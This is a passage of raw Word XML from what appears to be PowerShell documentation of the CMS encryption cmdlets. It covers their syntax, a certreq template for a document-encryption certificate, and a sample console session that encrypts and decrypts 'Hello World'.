        <w:t>Get-CmsMessage [-LiteralPath] &lt;string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Protect-CmsMessage [-To] &lt;CmsMessageRecipient[]&gt; [-Content] &lt;string&gt; [[-OutFile] &lt;string&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Protect-CmsMessage [-To] &lt;CmsMessageRecipient[]&gt; [-Path] &lt;string&gt; [[-OutFile] &lt;string&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Protect-CmsMessage [-To] &lt;CmsMessageRecipient[]&gt; [-LiteralPath] &lt;string&gt; [[-OutFile] &lt;string&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage [-EventLogRecord] &lt;EventLogRecord&gt; [[-To] &lt;CmsMessageRecipient[]&gt;] [-IncludeContext]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage [-Content] &lt;string&gt; [[-To] &lt;CmsMessageRecipient[]&gt;] [-IncludeContext]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage [-Path] &lt;string&gt; [[-To] &lt;CmsMessageRecipient[]&gt;] [-IncludeContext]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="00B07DE5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07DE5">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage [-LiteralPath] &lt;string&gt; [[-To] &lt;CmsMessageRecipient[]&gt;] [-IncludeContext]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="007F2F0A" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The CMS encryption standard implements public key cryptography, where the keys used to encrypt content (the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:i/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>public key</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) and the keys used to decrypt content (the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:i/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>private key</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) are </w:t>
      </w:r>
      <w:r w:rsidR="00DB29E7">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="007F2F0A" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Your public key can be shared widely, and is not sensitive data. If any content is encrypted with this public key, only your private key can decrypt it. For more information about Public Key Cryptography, see: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="007F2F0A">
          <w:rPr>
            <w:lang w:bidi="en-US"/>
          </w:rPr>
          <w:t>http://en.wikipedia.org/wiki/Public-key_cryptography</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="007F2F0A" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To be recognized in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>PowerShell, encryption certificates require a unique key usage identifier (EKU) to identify them as data encryption certificates (like the identifiers for 'Code Signing', 'Encrypted Mail').</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="007F2F0A" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is an example of creating a certificate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that is </w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>good for Document Encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="007F2F0A" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Change the text in </w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:b/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Subject</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your name, email, or other identifier), and put in a file (i.e.: DocumentEncryption.inf):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[Version]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Signature = "$Windows NT$"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[Strings]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>szOID_ENHANCED_KEY_USAGE = "2.5.29.37"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>szOID_DOCUMENT_ENCRYPTION = "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21569">
        <w:t>1.3.6.1.4.1.311.80.1</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[NewRequest]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Subject = "</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00C21569">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>cn=me@somewhere.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MachineKeySet = false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>KeyLength = 2048</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>KeySpec = AT_KEYEXCHANGE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HashAlgorithm = Sha1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exportable = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>RequestType = Cert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>KeyUsage = "CERT_KEY_ENCIPHERMENT_KEY_USAGE | CERT_DATA_ENCIPHERMENT_KEY_USAGE"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ValidityPeriod = "Years"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ValidityPeriodUnits = "1000"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[Extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>%szOID_ENHANCED_KEY_USAGE% = "{text}%szOID_DOCUMENT_ENCRYPTION%"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="007F2F0A" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Then run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>certreq -new DocumentEncryption.inf DocumentEncryption.cer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRPr="007F2F0A" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2F0A">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>And you can now encrypt and decrypt content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">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106 [C:\temp]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$protected</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>"Hello World"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Protect-CmsMessage</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-To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>"*me@somewhere.com*</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">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107 [C:\temp]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>-----BEGIN CMS-----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>MIIBqAYJKoZIhvcNAQcDoIIBmTCCAZUCAQAxggFQMIIBTAIBADA0MCAxHjAcBgNVBAMMFWxlZWhv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>bG1AbWljcm9zb2Z0LmNvbQIQQYHsbcXnjIJCtH+OhGmc1DANBgkqhkiG9w0BAQcwAASCAQAnkFHM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>proJnFy4geFGfyNmxH3yeoPvwEYzdnsoVqqDPAd8D3wao77z7OhJEXwz9GeFLnxD6djKV/tF4PxR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>E27aduKSLbnxfpf/sepZ4fUkuGibnwWFrxGE3B1G26MCenHWjYQiqv+Nq32Gc97qEAERrhLv6S4R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>G+2dJEnesW8A+z9QPo+DwYU5FzD0Td0ExrkswVckpLNR6j17Yaags3ltNVmbdEXekhi6Psf2MLMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>TSO79lv2L0KeXFGuPOrdzPAwCkV0vNEqTEBeDnZGrjv/5766bM3GW34FXApod9u+VSFpBnqVOCBA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>DVDraA6k+xwBt66cV84OHLkh0kT02SIHMDwGCSqGSIb3DQEHATAdBglghkgBZQMEASoEEJbJaiRl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>KMnBoD1dkb/FzSWAEBaL8xkFwCu0e1ZtDj7nSJc=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>-----END CMS-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">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108 [C:\temp]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>$protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Any parameter of type CMSMessageRecipient supports identifiers in the following formats:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A76A5" w:rsidRDefault="006A76A5" w:rsidP="006A76A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
